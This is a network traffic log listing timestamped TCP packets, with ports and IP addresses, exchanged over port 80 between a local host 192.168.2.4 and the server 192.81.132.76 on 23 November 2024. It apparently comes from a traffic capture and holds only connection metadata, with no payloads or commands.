Nov 23, 2024 12:47:18.658051014 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:18.659826994 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.659936905 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.659996986 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:18.661739111 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.661851883 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.661912918 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:18.663706064 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.663760900 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.663810968 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:18.665580988 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.665708065 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.665755987 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:18.667501926 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.667644024 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.667690992 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:18.669423103 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.669553041 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.669600010 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:18.671360970 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.671447992 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.671494961 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:18.673311949 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.673399925 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.673448086 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:18.675221920 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.675353050 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.675403118 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:18.677123070 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.677248955 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.677304983 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:18.679078102 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.679181099 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.679230928 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:18.681070089 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.681147099 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.681195021 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:18.682908058 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.682998896 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.683048964 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:18.684909105 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.685012102 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.685053110 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:18.686795950 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.686897039 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.686949968 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:18.688715935 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.688851118 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.688909054 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:18.690630913 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.690740108 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.690789938 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:18.692555904 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.692666054 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.692715883 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:18.694494009 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.694638968 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.694686890 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:18.696460009 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.696537971 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.696583033 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:18.698327065 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.750849009 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:18.802175999 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.802242994 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.802289009 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:18.803215981 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.803348064 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.803397894 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:18.805020094 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.805149078 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.805206060 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:18.806894064 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.807033062 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.807087898 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:18.808846951 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.808937073 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.808979988 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:18.810688019 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.860227108 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.003536940 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.003587008 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.003648043 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.004117012 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.004199028 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.004241943 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.005687952 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.005817890 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.005857944 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.007257938 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.007309914 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.007359028 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.008888006 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.009002924 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.009048939 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.010493040 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.010612011 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.010654926 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.012120962 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.012227058 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.012269974 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.013775110 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.013932943 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.013978958 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.015405893 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.015541077 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.015582085 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.017014027 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.017131090 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.017174959 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.018884897 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.063347101 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.204438925 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.204605103 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.204657078 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.205233097 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.205331087 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.205375910 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.206880093 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.207005024 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.207051992 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.208468914 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.208602905 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.208646059 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.210094929 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.210201979 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.210244894 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.211728096 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.211944103 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.211987019 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.213355064 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.213462114 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.213505030 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.214943886 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.215022087 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.215065002 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.216588020 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.216691017 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.216733932 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.218209028 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.218358040 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.218401909 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.219842911 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.219950914 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.219995022 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.221537113 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.221591949 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.221635103 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.223100901 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.223726034 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.223781109 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.224745035 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.224761009 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.224805117 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.226356030 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.226464033 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.226510048 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.227962971 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.228080988 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.228126049 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.229598045 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.229774952 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.229823112 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.231209040 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.231332064 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.231379032 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.232867956 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.233026981 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.233074903 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.234445095 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.234561920 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.234606028 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.236026049 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.282105923 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.406058073 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.406191111 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.406256914 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.406795979 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.406894922 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.407094002 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.408418894 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.408581972 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.408648968 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.410039902 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.410178900 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.410223961 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.411695004 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.411832094 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.411884069 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.413281918 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.413422108 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.414931059 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.414994001 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.415077925 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.416357994 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.416557074 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.416709900 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.416755915 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.418167114 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.418298960 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.418353081 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.419823885 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.419969082 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.420022964 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.421400070 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.421529055 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.421575069 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.423039913 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.423207998 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.423377991 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.424666882 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.424787045 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.424841881 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.426390886 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.426558971 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.426606894 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.428817034 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.428885937 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.428972960 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.429750919 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.429842949 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.429889917 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.431178093 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.431348085 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.431397915 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.432826996 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.432992935 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.433036089 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.434401989 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.434539080 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.434591055 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.436031103 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.436151028 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.436201096 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.437663078 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.437753916 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.437813997 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.439258099 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.439412117 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.439454079 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.440886021 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.441185951 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.441468954 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.442539930 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.442662954 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.442717075 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.444077015 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.444222927 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.444267988 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.445741892 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.445858955 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.445904016 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.447340965 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.447455883 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.447504997 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.449002028 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.449105978 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.449151993 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.450623989 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.450746059 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.450794935 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.452248096 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.452379942 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.452425957 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.453834057 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.453957081 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.453998089 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.455482006 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.455605984 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.455651999 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.457129002 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.457211018 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.457257032 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.458746910 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.458836079 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.458906889 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.460350990 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.460448980 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.460489035 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.461976051 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.462114096 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.462158918 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.463606119 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.463690042 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.463736057 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.465219021 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.465321064 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.465363026 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.467010975 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.467133045 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.467178106 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.606985092 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.607114077 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.607199907 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.607734919 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.607829094 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.608355045 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.609325886 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.609456062 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.609504938 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.610948086 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.611107111 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.612354994 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.612577915 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.612695932 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.614176035 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.614202976 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.614291906 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.614341021 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.615828991 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.615906954 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.615957975 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.617532969 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.617667913 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.617734909 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.619075060 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.619191885 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.619904041 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.620701075 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.620820045 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.620866060 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.622327089 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.622447014 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.623960972 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.624007940 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.624044895 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.624352932 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.625569105 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.625674963 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.625720024 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.627222061 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.627374887 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.627415895 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.628835917 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.628899097 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.628948927 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.630481005 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.630589962 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.630650043 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.632078886 CET	80	49735	192.81.132.76	192.168.2.4
